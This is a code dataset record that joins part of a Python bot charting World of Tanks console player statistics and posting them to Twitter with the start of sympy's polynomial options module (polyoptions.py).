'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players = es.search(index=config['battle index'], body=players_query)
battles = es.search(index=config['battle index'], body=battles_query)
players_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
battles_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
average_battles_per_day_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
for bucket in players['aggregations']['2']['buckets']:
key = bucket['key_as_string'].split('T')[0]
players_buckets['xbox'][key] = 0
players_buckets['ps'][key] = 0
players_buckets['all'][key] = 0
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
players_buckets[subbucket['key']][key] = subbucket['doc_count']
players_buckets['all'][key] = players_buckets['xbox'][key] + players_buckets['ps'][key]
for bucket in battles['aggregations']['2']['buckets']:
key = bucket['key_as_string'].split('T')[0]
battles_buckets['xbox'][key] = 0
battles_buckets['ps'][key] = 0
battles_buckets['all'][key] = 0
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
battles_buckets[subbucket['key']][key] = subbucket['1']['value']
battles_buckets['all'][key] = battles_buckets['xbox'][key] + battles_buckets['ps'][key]
if filter_server_failures:
skip_next = False
for key, value in players_buckets['ps'].items():
# 20,000 is way below normal. Sometimes the server dies partway through. This day should be skipped
if value < 20000:
players_buckets['xbox'][key] = None
players_buckets['ps'][key] = None
players_buckets['all'][key] = None
battles_buckets['xbox'][key] = None
battles_buckets['ps'][key] = None
battles_buckets['all'][key] = None
skip_next = True
elif skip_next:
players_buckets['xbox'][key] = None
players_buckets['ps'][key] = None
players_buckets['all'][key] = None
battles_buckets['xbox'][key] = None
battles_buckets['ps'][key] = None
battles_buckets['all'][key] = None
skip_next = False
for key in players_buckets['all'].keys():
if players_buckets['xbox'][key] is None:
average_battles_per_day_buckets['all'][key] = None
average_battles_per_day_buckets['xbox'][key] = None
average_battles_per_day_buckets['ps'][key] = None
else:
average_battles_per_day_buckets['xbox'][key] = battles_buckets['xbox'][key] / players_buckets['xbox'][key]
average_battles_per_day_buckets['ps'][key] = battles_buckets['ps'][key] / players_buckets['ps'][key]
average_battles_per_day_buckets['all'][key] = (battles_buckets['xbox'][key] + battles_buckets['ps'][key]) / (players_buckets['xbox'][key] + players_buckets['ps'][key])
delkey = list(players_buckets['all'].keys())[0]
# delkey = list(battles_buckets['all'].keys())[0]
del players_buckets['all'][key]
del players_buckets['xbox'][key]
del players_buckets['ps'][key]
del battles_buckets['all'][key]
del battles_buckets['xbox'][key]
del battles_buckets['ps'][key]
del average_battles_per_day_buckets['xbox'][key]
del average_battles_per_day_buckets['ps'][key]
del average_battles_per_day_buckets['all'][key]
return players_buckets, battles_buckets, average_battles_per_day_buckets
def create_long_term_charts(players_buckets, battles_buckets, average_battles_per_day_buckets, watermark_text='@WOTC_Tracker'):
dates = [datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1) for d in players_buckets['all'].keys()]
# Players PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Active Accounts Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, players_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, players_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(PLAYERSLONG_PNG)
del fig
# Battles PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Total Battles Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, battles_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, battles_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(BATTLESLONG_PNG)
del fig
# Average PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Average Battles Played Per Account Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, average_battles_per_day_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, average_battles_per_day_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(AVERAGELONG_PNG)
del fig
def upload_long_term_charts(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
playerslong = api.media_upload(PLAYERSLONG_PNG)
battleslong = api.media_upload(BATTLESLONG_PNG)
averagelong = api.media_upload(AVERAGELONG_PNG)
api.update_status(
status='Long-term view of active accounts, with downtime and multi-day catchup errors omitted',
media_ids=[playerslong.media_id, battleslong.media_id, averagelong.media_id]
)
def upload_long_term_mode_charts(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
modelong = api.media_upload(MODEBREAKDOWNLONG_PNG)
percentlong = api.media_upload(MODEBREAKDOWNPERCENTLONG_PNG)
api.update_status(
status='Long-term view of battles per mode',
media_ids=[modelong.media_id, percentlong.media_id]
)
def upload_activity_graphs_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battles = api.media_upload(BATTLES_PNG)
players = api.media_upload(PLAYERS_PNG)
newplayers = api.media_upload(NEWPLAYERS_PNG)
averages = api.media_upload(AVERAGE_PNG)
api.update_status(
status=config['twitter']['message'],
media_ids=[players.media_id, battles.media_id, newplayers.media_id, averages.media_id]
)
def upload_account_age_graph_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
accountage = api.media_upload(ACCOUNTAGE_PNG)
api.update_status(
status='Breakdown of active accounts by age per platform on #worldoftanksconsole',
media_ids=[accountage.media_id]
)
def upload_accounts_by_battles_chart_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battlerange = api.media_upload(BATTLERANGE_PNG)
api.update_status(
status='Breakdown of accounts by number of battles played on #worldoftanksconsole',
media_ids=[battlerange.media_id]
)
def upload_five_battles_minimum_chart_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
fiveaday = api.media_upload(FIVEADAY_PNG)
api.update_status(
status='Filtering accounts per day with 5 battles minimum on #worldoftanksconsole',
media_ids=[fiveaday.media_id]
)
def share_unique_with_twitter(config, unique):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
status = 'Unique Active Accounts For {} Over Time\n{}'
formatting = '{} days: {}'
for key, values in unique.items():
api.update_status(
status=status.format(
key,
'\n'.join(map(lambda l: formatting.format(
config['unique'][values.index(l)], l), values))
)
)
def build_cw_tanks_list(config):
api = 'https://api-console.worldoftanks.com/wotx/encyclopedia/vehicles/'
params = {
'application_id': config['wg api key'],
'fields': 'era,tank_id'
}
data = get(api, params=params).json()['data']
return ' OR '.join(
list(
map(
lambda t: 'tank_id:{}'.format(t['tank_id']),
filter(lambda t: t['era'] != '', data.values())
)
)
)
def query_es_for_top_tanks(config, era):
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
if era == 'ww2':
query = ww2_popular_tanks_query
elif era == 'cw':
query = cw_popular_tanks_query
# Setup query
query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
response = es.search(index=config['tank index'], body=query)
buckets = {
'xbox': OrderedDict(),
'ps': OrderedDict()
}
for bucket in response['aggregations']['2']['buckets']:
for subbucket in bucket['4']['buckets']:
key = subbucket['key']
for tank in subbucket['3']['buckets']:
buckets[key][tank['key']] = int(tank['1']['value'])
return buckets
def query_for_tank_info(tanks):
url = 'https://wotconsole.ru/api/tankopedia/en/{}.json'
new_tanks = {
'xbox': OrderedDict(),
'ps': OrderedDict()
}
for plat, t in tanks.items():
for tank, battles in t.items():
response = get(url.format(tank))
new_tanks[plat][response.json()['info']['user_string']] = battles
new_tanks['playstation'] = new_tanks['ps']
del new_tanks['ps']
return new_tanks
def share_top_tanks(config, era, top, day):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
for platform, tanks in top.items():
status = "Most used {} tanks on {} for {}\n{}"
formatting = '{}: {} battles'
api.update_status(
status=status.format(
era,
platform.capitalize(),
day,
'\n'.join([formatting.format(tank, battles) for tank, battles in tanks.items()])
)
)
def query_es_for_mode_battles_difference(config, long_term=False):
now = datetime.utcnow()
then = now - timedelta(days=config['days'] if not long_term else config['long term'])
es = Elasticsearch(**config['elasticsearch'])
# Setup query
battles_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
cw_popular_tanks_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
cw_popular_tanks_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
total_battles_response = es.search(index=config['battle index'], body=battles_query)
cw_battles_response = es.search(index=config['tank index'], body=cw_popular_tanks_query)
dates = [b['key_as_string'].split('T')[0] for b in total_battles_response[
'aggregations']['2']['buckets']]
# Filter numbers
ww2_battles_xbox = OrderedDict()
ww2_battles_ps = OrderedDict()
cw_battles_xbox = OrderedDict()
cw_battles_ps = OrderedDict()
percent_cw_xbox = OrderedDict()
percent_cw_ps = OrderedDict()
for d in dates:
ww2_battles_xbox[d] = 0
ww2_battles_ps[d] = 0
cw_battles_xbox[d] = 0
cw_battles_ps[d] = 0
percent_cw_xbox[d] = None
percent_cw_ps[d] = None
for bucket in total_battles_response['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
ww2_battles_xbox[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
else:
ww2_battles_ps[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
for bucket in cw_battles_response['aggregations']['2']['buckets']:
if not bucket['4']['buckets']:
continue
for subbucket in bucket['4']['buckets']:
if subbucket['key'] == 'xbox':
cw_battles_xbox[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
else:
cw_battles_ps[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
for i in range(len(dates)):
percent_cw_xbox[dates[i]] = cw_battles_xbox[dates[i]] / ww2_battles_xbox[dates[i]]
percent_cw_ps[dates[i]] = cw_battles_ps[dates[i]] / ww2_battles_ps[dates[i]]
ww2_battles_xbox[dates[i]] = ww2_battles_xbox[dates[i]] - cw_battles_xbox[dates[i]]
ww2_battles_ps[dates[i]] = ww2_battles_ps[dates[i]] - cw_battles_ps[dates[i]]
return dates, list(ww2_battles_xbox.values()), list(ww2_battles_ps.values()), list(cw_battles_xbox.values()), list(cw_battles_ps.values()), list(percent_cw_xbox.values()), list(percent_cw_ps.values())
def create_mode_difference_graph(dates, ww2_battles_xbox, ww2_battles_ps, cw_battles_xbox, cw_battles_ps, percent_cw_xbox, percent_cw_ps, long_term=False, watermark_text='@WOTC_Tracker'):
shifted_dates = [(datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d') for d in dates]
# Mode PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150) if not long_term else plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Estimated breakdown of battles between CW and WW2, per platform' if not long_term else 'Estimated breakdown of battles between CW and WW2, per platform (long term)')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, ww2_battles_xbox, color='darkgreen', linewidth=2, label='WW2: Xbox')
ax1.plot(shifted_dates, cw_battles_xbox, color='lightgreen', linewidth=2, label='CW: Xbox')
ax1.plot(shifted_dates, ww2_battles_ps, color='darkblue', linewidth=2, label='WW2: Playstation')
ax1.plot(shifted_dates, cw_battles_ps, color='lightblue', linewidth=2, label='CW: Playstation')
ax1.set_ylim(bottom=0)
# for i in range(len(shifted_dates)):
# xbox_text = ax1.annotate(annotations_xbox[i], (shifted_dates[i], ww2_battles_xbox[i]), verticalalignment='bottom', size=12 if not long_term else 8)
# ps_text = ax1.annotate(annotations_ps[i], (shifted_dates[i], ww2_battles_ps[i]), verticalalignment='bottom', size=12 if not long_term else 8)
# xbox_text.set_rotation(90)
# ps_text.set_rotation(90)
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(MODEBREAKDOWN_PNG if not long_term else MODEBREAKDOWNLONG_PNG)
del fig
# Mode Percent PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150) if not long_term else plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Estimated percentage of battles taking place in CW, per platform' if not long_term else 'Estimated percentage of battles taking place in CW, per platform (long term)')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.yaxis.set_major_formatter(mtick.PercentFormatter(1.0))
ax1.tick_params(axis='x', labelrotation=45)
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, percent_cw_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, percent_cw_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(MODEBREAKDOWNPERCENT_PNG if not long_term else MODEBREAKDOWNPERCENTLONG_PNG)
del fig
def upload_mode_breakdown_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battles = api.media_upload(MODEBREAKDOWN_PNG)
percent = api.media_upload(MODEBREAKDOWNPERCENT_PNG)
api.update_status(
status="Estimated split between WW2 and CW battles",
media_ids=[battles.media_id, percent.media_id]
)
def get_universal_params(config):
params = dict()
watermark = config.get('watermark text', None)
if watermark:
params['watermark_text'] = watermark
return params
if __name__ == '__main__':
agp = ArgumentParser(
description='Bot for processing tracker data and uploading to Twitter')
agp.add_argument('config', help='Config file location')
agp.add_argument('-u', '--upload', help='Upload to twitter', action='store_true')
agp.add_argument('--activity-graphs', action='store_true')
agp.add_argument('--account-age', action='store_true')
agp.add_argument('--accounts-by-battles', action='store_true')
agp.add_argument('--five-battles-min', action='store_true')
agp.add_argument('--long-term', action='store_true')
agp.add_argument('--share-unique', action='store_true')
agp.add_argument('--top-cw-tanks', action='store_true')
agp.add_argument('--top-ww2-tanks', action='store_true')
agp.add_argument('--mode-breakdown', action='store_true')
args = agp.parse_args()
config = manage_config('read', args.config)
additional_params = get_universal_params(config)
now = datetime.utcnow()
if args.top_cw_tanks or args.top_ww2_tanks or args.mode_breakdown or args.long_term:
CW_TANKS = build_cw_tanks_list(config)
cw_popular_tanks_query['query']['bool']['must'][0]['query_string']['query'] = CW_TANKS
ww2_popular_tanks_query['query']['bool']['must'][0]['query_string']['query'] = 'NOT (' + CW_TANKS + ')'
if args.activity_graphs:
try:
create_activity_graphs(*query_es_for_graphs(config), **additional_params)
if args.upload:
upload_activity_graphs_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.account_age:
try:
create_account_age_chart(query_es_for_active_accounts(config), **additional_params)
if args.upload:
upload_account_age_graph_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.accounts_by_battles:
try:
create_accounts_by_battles_chart(query_es_for_accounts_by_battles(config), **additional_params)
if args.upload:
upload_accounts_by_battles_chart_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.five_battles_min:
try:
create_five_battles_minimum_chart(query_five_battles_a_day_minimum(config), **additional_params)
if args.upload:
upload_five_battles_minimum_chart_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
# Limit long-term views to beginning of month to review previous month's history
if args.long_term:
if now.day == 1:
try:
create_long_term_charts(*query_long_term_data(config, config.get('omit errors long term', True)), **additional_params)
create_mode_difference_graph(*query_es_for_mode_battles_difference(config, long_term=True), long_term=True, **additional_params)
if args.upload:
upload_long_term_charts(config)
upload_long_term_mode_charts(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.share_unique:
try:
share_unique_with_twitter(config, query_es_for_unique(config))
except Exception as e:
# print(e)
traceback.print_exc()
if args.top_cw_tanks:
try:
share_top_tanks(config, 'CW', query_for_tank_info(query_es_for_top_tanks(config, 'cw')), (now - timedelta(days=1)).strftime('%Y-%m-%d'))
except Exception as e:
# print(e)
traceback.print_exc()
if args.top_ww2_tanks:
try:
share_top_tanks(config, 'WW2', query_for_tank_info(query_es_for_top_tanks(config, 'ww2')), (now - timedelta(days=1)).strftime('%Y-%m-%d'))
except Exception as e:
# print(e)
traceback.print_exc()
if args.mode_breakdown:
try:
create_mode_difference_graph(*query_es_for_mode_battles_difference(config), **additional_params)
if args.upload:
upload_mode_breakdown_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
| 37.474413 | 204 | 0.531545 | [
"MIT"
] | kamakazikamikaze/wotc-bot-twitter | bot.py | 62,245 | Python |
"""Options manager for :class:`Poly` and public API functions. """
from __future__ import print_function, division
__all__ = ["Options"]
from sympy.core import S, Basic, sympify
from sympy.core.compatibility import string_types, with_metaclass
from sympy.utilities import numbered_symbols, topological_sort, public
from sympy.utilities.iterables import has_dups
from sympy.polys.polyerrors import GeneratorsError, OptionError, FlagError
import sympy.polys
import re
class Option(object):
"""Base class for all kinds of options. """
option = None
is_Flag = False
requires = []
excludes = []
after = []
before = []
@classmethod
def default(cls):
return None
@classmethod
def preprocess(cls, option):
return None
@classmethod
def postprocess(cls, options):
pass
class Flag(Option):
"""Base class for all kinds of flags. """
is_Flag = True
class BooleanOption(Option):
"""An option that must have a boolean value or equivalent assigned. """
@classmethod
def preprocess(cls, value):
if value in [True, False]:
return bool(value)
else:
raise OptionError("'%s' must have a boolean value assigned, got %s" % (cls.option, value))
class OptionType(type):
"""Base type for all options that does registers options. """
def __init__(cls, *args, **kwargs):
@property
def getter(self):
try:
return self[cls.option]
except KeyError:
return cls.default()
setattr(Options, cls.option, getter)
Options.__options__[cls.option] = cls
@public
class Options(dict):
"""
Options manager for polynomial manipulation module.
Examples
========
>>> from sympy.polys.polyoptions import Options
>>> from sympy.polys.polyoptions import build_options
>>> from sympy.abc import x, y, z
>>> Options((x, y, z), {'domain': 'ZZ'})
{'auto': False, 'domain': ZZ, 'gens': (x, y, z)}
>>> build_options((x, y, z), {'domain': 'ZZ'})
{'auto': False, 'domain': ZZ, 'gens': (x, y, z)}
**Options**
* Expand --- boolean option
* Gens --- option
* Wrt --- option
* Sort --- option
* Order --- option
* Field --- boolean option
* Greedy --- boolean option
* Domain --- option
* Split --- boolean option
* Gaussian --- boolean option
* Extension --- option
* Modulus --- option
* Symmetric --- boolean option
* Strict --- boolean option
**Flags**
* Auto --- boolean flag
* Frac --- boolean flag
* Formal --- boolean flag
* Polys --- boolean flag
* Include --- boolean flag
* All --- boolean flag
* Gen --- flag
"""
__order__ = None
__options__ = {}
def __init__(self, gens, args, flags=None, strict=False):
dict.__init__(self)
if gens and args.get('gens', ()):
raise OptionError(
"both '*gens' and keyword argument 'gens' supplied")
elif gens:
args = dict(args)
args['gens'] = gens
defaults = args.pop('defaults', {})
def preprocess_options(args):
for option, value in args.items():
try:
cls = self.__options__[option]
except KeyError:
raise OptionError("'%s' is not a valid option" % option)
if issubclass(cls, Flag):
if flags is None or option not in flags:
if strict:
raise OptionError("'%s' flag is not allowed in this context" % option)
if value is not None:
self[option] = cls.preprocess(value)
preprocess_options(args)
for key, value in dict(defaults).items():
if key in self:
del defaults[key]
else:
for option in self.keys():
cls = self.__options__[option]
if key in cls.excludes:
del defaults[key]
break
preprocess_options(defaults)
for option in self.keys():
cls = self.__options__[option]
for require_option in cls.requires:
if self.get(require_option) is None:
raise OptionError("'%s' option is only allowed together with '%s'" % (option, require_option))
for exclude_option in cls.excludes:
if self.get(exclude_option) is not None:
raise OptionError("'%s' option is not allowed together with '%s'" % (option, exclude_option))
for option in self.__order__:
self.__options__[option].postprocess(self)
@classmethod
def _init_dependencies_order(cls):
"""Resolve the order of options' processing. """
if cls.__order__ is None:
vertices, edges = [], set([])
for name, option in cls.__options__.items():
vertices.append(name)
for _name in option.after:
edges.add((_name, name))
for _name in option.before:
edges.add((name, _name))
try:
cls.__order__ = topological_sort((vertices, list(edges)))
except ValueError:
raise RuntimeError(
"cycle detected in sympy.polys options framework")
def clone(self, updates={}):
"""Clone ``self`` and update specified options. """
obj = dict.__new__(self.__class__)
for option, value in self.items():
obj[option] = value
for option, value in updates.items():
obj[option] = value
return obj
def __setattr__(self, attr, value):
if attr in self.__options__:
self[attr] = value
else:
super(Options, self).__setattr__(attr, value)
@property
def args(self):
args = {}
for option, value in self.items():
if value is not None and option != 'gens':
cls = self.__options__[option]
if not issubclass(cls, Flag):
args[option] = value
return args
@property
def options(self):
options = {}
for option, cls in self.__options__.items():
if not issubclass(cls, Flag):
options[option] = getattr(self, option)
return options
@property
def flags(self):
flags = {}
for option, cls in self.__options__.items():
if issubclass(cls, Flag):
flags[option] = getattr(self, option)
return flags
class Expand(with_metaclass(OptionType, BooleanOption)):
"""``expand`` option to polynomial manipulation functions. """
option = 'expand'
requires = []
excludes = []
@classmethod
def default(cls):
return True
class Gens(with_metaclass(OptionType, Option)):
"""``gens`` option to polynomial manipulation functions. """
option = 'gens'
requires = []
excludes = []
@classmethod
def default(cls):
return ()
@classmethod
def preprocess(cls, gens):
if isinstance(gens, Basic):
gens = (gens,)
elif len(gens) == 1 and hasattr(gens[0], '__iter__'):
gens = gens[0]
if gens == (None,):
gens = ()
elif has_dups(gens):
raise GeneratorsError("duplicated generators: %s" % str(gens))
elif any(gen.is_commutative is False for gen in gens):
raise GeneratorsError("non-commutative generators: %s" % str(gens))
return tuple(gens)
class Wrt(with_metaclass(OptionType, Option)):
"""``wrt`` option to polynomial manipulation functions. """
option = 'wrt'
requires = []
excludes = []
_re_split = re.compile(r"\s*,\s*|\s+")
@classmethod
def preprocess(cls, wrt):
if isinstance(wrt, Basic):
return [str(wrt)]
elif isinstance(wrt, str):
wrt = wrt.strip()
if wrt.endswith(','):
raise OptionError('Bad input: missing parameter.')
if not wrt:
return []
return [ gen for gen in cls._re_split.split(wrt) ]
elif hasattr(wrt, '__getitem__'):
return list(map(str, wrt))
else:
raise OptionError("invalid argument for 'wrt' option")
class Sort(with_metaclass(OptionType, Option)):
"""``sort`` option to polynomial manipulation functions. """
option = 'sort'
requires = []
excludes = []
@classmethod
def default(cls):
return []
@classmethod
def preprocess(cls, sort):
if isinstance(sort, str):
return [ gen.strip() for gen in sort.split('>') ]
elif hasattr(sort, '__getitem__'):
return list(map(str, sort))
else:
raise OptionError("invalid argument for 'sort' option")
class Order(with_metaclass(OptionType, Option)):
"""``order`` option to polynomial manipulation functions. """
option = 'order'
requires = []
excludes = []
@classmethod
def default(cls):
return sympy.polys.orderings.lex
@classmethod
def preprocess(cls, order):
return sympy.polys.orderings.monomial_key(order)
class Field(with_metaclass(OptionType, BooleanOption)):
"""``field`` option to polynomial manipulation functions. """
option = 'field'
requires = []
excludes = ['domain', 'split', 'gaussian']
class Greedy(with_metaclass(OptionType, BooleanOption)):
"""``greedy`` option to polynomial manipulation functions. """
option = 'greedy'
requires = []
excludes = ['domain', 'split', 'gaussian', 'extension', 'modulus', 'symmetric']
class Composite(with_metaclass(OptionType, BooleanOption)):
"""``composite`` option to polynomial manipulation functions. """
option = 'composite'
@classmethod
def default(cls):
return None
requires = []
excludes = ['domain', 'split', 'gaussian', 'extension', 'modulus', 'symmetric']
class Domain(with_metaclass(OptionType, Option)):
"""``domain`` option to polynomial manipulation functions. """
option = 'domain'
requires = []
excludes = ['field', 'greedy', 'split', 'gaussian', 'extension']
after = ['gens']
_re_realfield = re.compile("^(R|RR)(_(\d+))?$")
_re_complexfield = re.compile("^(C|CC)(_(\d+))?$")
_re_finitefield = re.compile("^(FF|GF)\((\d+)\)$")
_re_polynomial = re.compile("^(Z|ZZ|Q|QQ)\[(.+)\]$")
_re_fraction = re.compile("^(Z|ZZ|Q|QQ)\((.+)\)$")
_re_algebraic = re.compile("^(Q|QQ)\<(.+)\>$")
@classmethod
def preprocess(cls, domain):
if isinstance(domain, sympy.polys.domains.Domain):
return domain
elif hasattr(domain, 'to_domain'):
return domain.to_domain()
elif isinstance(domain, string_types):
if domain in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ
if domain in ['Q', 'QQ']:
return sympy.polys.domains.QQ
if domain == 'EX':
return sympy.polys.domains.EX
r = cls._re_realfield.match(domain)
if r is not None:
_, _, prec = r.groups()
if prec is None:
return sympy.polys.domains.RR
else:
return sympy.polys.domains.RealField(int(prec))
r = cls._re_complexfield.match(domain)
if r is not None:
_, _, prec = r.groups()
if prec is None:
return sympy.polys.domains.CC
else:
return sympy.polys.domains.ComplexField(int(prec))
r = cls._re_finitefield.match(domain)
if r is not None:
return sympy.polys.domains.FF(int(r.groups()[1]))
r = cls._re_polynomial.match(domain)
if r is not None:
ground, gens = r.groups()
gens = list(map(sympify, gens.split(',')))
if ground in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ.poly_ring(*gens)
else:
return sympy.polys.domains.QQ.poly_ring(*gens)
r = cls._re_fraction.match(domain)
if r is not None:
ground, gens = r.groups()
gens = list(map(sympify, gens.split(',')))
if ground in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ.frac_field(*gens)
else:
return sympy.polys.domains.QQ.frac_field(*gens)
r = cls._re_algebraic.match(domain)
if r is not None:
gens = list(map(sympify, r.groups()[1].split(',')))
return sympy.polys.domains.QQ.algebraic_field(*gens)
raise OptionError('expected a valid domain specification, got %s' % domain)
@classmethod
def postprocess(cls, options):
if 'gens' in options and 'domain' in options and options['domain'].is_Composite and \
(set(options['domain'].symbols) & set(options['gens'])):
raise GeneratorsError(
"ground domain and generators interfere together")
elif ('gens' not in options or not options['gens']) and \
'domain' in options and options['domain'] == sympy.polys.domains.EX:
raise GeneratorsError("you have to provide generators because EX domain was requested")
class Split(with_metaclass(OptionType, BooleanOption)):
"""``split`` option to polynomial manipulation functions. """
option = 'split'
requires = []
excludes = ['field', 'greedy', 'domain', 'gaussian', 'extension',
'modulus', 'symmetric']
@classmethod
def postprocess(cls, options):
if 'split' in options:
raise NotImplementedError("'split' option is not implemented yet")
class Gaussian(with_metaclass(OptionType, BooleanOption)):
"""``gaussian`` option to polynomial manipulation functions. """
option = 'gaussian'
requires = []
excludes = ['field', 'greedy', 'domain', 'split', 'extension',
'modulus', 'symmetric']
@classmethod
def postprocess(cls, options):
if 'gaussian' in options and options['gaussian'] is True:
options['extension'] = set([S.ImaginaryUnit])
Extension.postprocess(options)
class Extension(with_metaclass(OptionType, Option)):
"""``extension`` option to polynomial manipulation functions. """
option = 'extension'
requires = []
excludes = ['greedy', 'domain', 'split', 'gaussian', 'modulus',
'symmetric']
@classmethod
def preprocess(cls, extension):
if extension == 1:
return bool(extension)
elif extension == 0:
raise OptionError("'False' is an invalid argument for 'extension'")
else:
if not hasattr(extension, '__iter__'):
extension = set([extension])
else:
if not extension:
extension = None
else:
extension = set(extension)
return extension
@classmethod
def postprocess(cls, options):
if 'extension' in options and options['extension'] is not True:
options['domain'] = sympy.polys.domains.QQ.algebraic_field(
*options['extension'])
class Modulus(with_metaclass(OptionType, Option)):
"""``modulus`` option to polynomial manipulation functions. """
option = 'modulus'
requires = []
excludes = ['greedy', 'split', 'domain', 'gaussian', 'extension']
@classmethod
def preprocess(cls, modulus):
modulus = sympify(modulus)
